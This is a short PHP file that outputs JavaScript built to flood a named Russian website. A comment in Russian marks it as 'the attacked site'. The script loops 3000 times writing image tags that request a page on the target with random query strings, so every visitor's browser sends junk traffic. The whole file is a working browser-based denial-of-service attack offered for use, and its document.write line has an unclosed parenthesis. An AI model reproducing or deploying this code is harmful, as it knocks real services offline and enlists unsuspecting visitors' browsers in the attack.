<?
echo '<script type="text/javascript">';
?>
attack_host="wap.ayfon.ru" //адрес атакуемого сайта
attack_port=80
path='Shared/Compatibility.aspx'
for(i=1;i<=3000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' + Math.random() + '">';}

<?
echo '</script>';
?>